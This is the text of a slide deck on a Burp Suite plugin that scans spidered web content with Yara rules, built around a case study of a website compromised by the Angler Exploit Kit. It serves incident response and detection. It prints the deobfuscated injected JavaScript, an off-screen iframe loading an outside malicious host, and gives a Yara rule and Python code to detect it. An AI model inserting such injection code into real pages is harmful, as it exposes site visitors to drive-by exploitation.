Burpsuite / Yara Integration
Ian Duffy
Polito, Inc.
@politoinc
Introduction
• Who am I?
• About Burpsuite and Yara
• Case study: A compromised website
• Plugin development
• Future Roadmap
• Questions
Who am I?
• Former USAF network defender
• Current cybersecurity consultant for Polito
• Background in penetration testing (traditional and web application) as well as malware analysis
• Current duties involve malware analysis and threat hunting
Burpsuite
• Burpsuite is a MITM proxy tool for viewing, intercepting, modifying, and transmitting HTTP(S) requests and responses.
• Allows the user to view all web content down to the byte level, to include static pages, JavaScript, JSON, WebSockets, and much more.
• Includes several tools for assessing the security of web applications
BurpSuite
Yara
• Yara is a sophisticated pattern matching tool
• Specifies a language for describing strings, binary / hexadecimal data, file offset information, and file structure information in order to write pattern matching rules
• Rules can be run against one or many files or data streams in order to find matches
Yara Rules Example
Case Study
• Client contacts Polito and says that their IT department is getting phone calls stating that their website is causing “FireEye Alerts” and is likely compromised
• Polito is asked to investigate and determine:
– Whether the site is actually compromised
– If so, scope, scale, and impact of the compromise
Case Study
• We request a tarball of the current webroot folder and a dump of any backend CMS databases
• In the meantime we begin spidering the website using Burpsuite…
Case Study
Highly obfuscated JavaScript – interesting…
Case Study
• The obfuscated JavaScript is consistent with the Angler Exploit Kit, which matches the alerts reported by our client’s IT department
• After deobfuscation of the JavaScript we see the following:
document.write('<style>.ddidfodevxgsz{position:absolute;top:-907px;width:300px;height:300px;}</style><div class="ddidfodevxgsz"><iframe src="http://ryonfmza.buildera.cf/consent/knife-lodge-19720974" width="250" height="250"></iframe></div>');
Case Study
Case Study
• Problems:
– How do we identify whether this EK landing page / malicious JavaScript has been inserted into any other pages on the site?
– How do we identify whether the attackers have left themselves a back door?
Case Study
• Possible Solutions:
– Wait for three days before client can get tarball of their website uploaded to our SFTP server
– Manually search through online web content
– Write something to automate our searching
Writing Burpsuite Plugins
• Burpsuite supports plugins in Java, Ruby, and Python
– Ruby requires JRuby
– Python requires Jython
• We decided to use Python to develop our Yara integration for expedience
The Plugin…
• Burpsuite specifies several interfaces for performing various tasks
• Depending on what functionality we are trying to implement, we must implement one or more of those interfaces
• The interfaces specify methods that must be implemented in order to handle events from the Burpsuite UI
The Plugin…
• Each of the interfaces requires specific methods be implemented
– IBurpExtender requires a method named registerExtenderCallbacks
– ITab requires methods named getTabCaption and getUIComponent
• Documentation for the interfaces is available at:
– https://portswigger.net/burp/extender/api/index.html
The Plugin…
• Our basic use case was as follows:
– Burpsuite user spiders a website to retrieve as much of the content as possible
– User right-clicks on website in Burp UI and selects “Scan with Yara”
– Yara is used to scan the content of the web requests and responses
– Results displayed to user in a Tab
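Added example (not the Polito plugin's code, and not the deck's rules-example slide): the scanning core behind the “Scan with Yara” use case above, with a rule written here for the case-study injection (the off-screen div wrapping an iframe). It assumes a yara binary on PATH; the rule name, the regexes, and the temp-file-plus-CLI approach are this example's assumptions, not the deck's.

```python
"""Scan-with-Yara core: dump a Burp response body to a file, run yara -s, parse its output."""
import re
import subprocess
from tempfile import NamedTemporaryFile

# Constructed rule (an assumption, not from the deck) for the case-study injection:
# a <div> pushed far off-screen (top:-907px) wrapping an <iframe>. Both must hit.
ANGLER_LANDING_RULE = r'''
rule angler_hidden_iframe_injection
{
    strings:
        $hidden_div = /position:\s*absolute;\s*top:\s*-\d{3,}px/ nocase
        $iframe = "<iframe" nocase
    condition:
        $hidden_div and $iframe
}
'''

# "yara -s" prints "rule_name file" then one "0xOFFSET:$ident: data" line per hit.
MATCH_LINE = re.compile(r'^0x([0-9a-fA-F]+):\$(\w+): ?(.*)$')

def split_body(raw_response):
    """Return the body of a raw HTTP response (bytes after the header block)."""
    _, sep, body = raw_response.partition(b"\r\n\r\n")
    return body if sep else raw_response

def parse_yara_output(text):
    """Parse yara -s output into {rule_name: [(offset, identifier, data), ...]}."""
    results, current = {}, None
    for line in text.splitlines():
        m = MATCH_LINE.match(line)
        if m and current is not None:
            results[current].append((int(m.group(1), 16), m.group(2), m.group(3)))
        elif line.strip():
            current = line.split(None, 1)[0]
            results.setdefault(current, [])
    return results

def scan_response(raw_response, rule_source=ANGLER_LANDING_RULE):
    """Scan one response body with the yara binary (Popen also works on Jython 2.7)."""
    with NamedTemporaryFile(suffix=".yar") as rules, NamedTemporaryFile(suffix=".bin") as data:
        rules.write(rule_source.encode("utf-8"))
        rules.flush()
        data.write(split_body(raw_response))
        data.flush()
        proc = subprocess.Popen(["yara", "-s", rules.name, data.name],
                                stdout=subprocess.PIPE, universal_newlines=True)
        out, _ = proc.communicate()
    return parse_yara_output(out)
```

Inside Burp, each site-map entry's response (a Java byte array under Jython) would be passed to scan_response and the parsed dictionary rendered in the tab.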
Jython
• Jython is a hybrid between Java and Python
• You can “import” Java classes, instantiate Java objects, and call their methods via Python code:
Jython
• Java objects are instantiated by calling a constructor method with the same name as the class
– No “new” keyword like in Java
– Parameters to the constructors are the same
• Once instantiated, class objects can be used just as with Java
Demonstration
Live demo time – this always works!
Future Roadmap
• Things that we are looking into:
– Live Yara scanning as you surf
– Persistent configuration settings
– Multiple rules files
• Your thoughts and feature requests are most welcome!
Grab a Copy
• Plugin is available on our Github site:
– https://github.com/PolitoInc/Yara-Scanner
• Please send any feedback to [email protected]
Questions?
Ian Duffy
Polito, Inc.
@politoinc
www.politoinc.com
Thank You!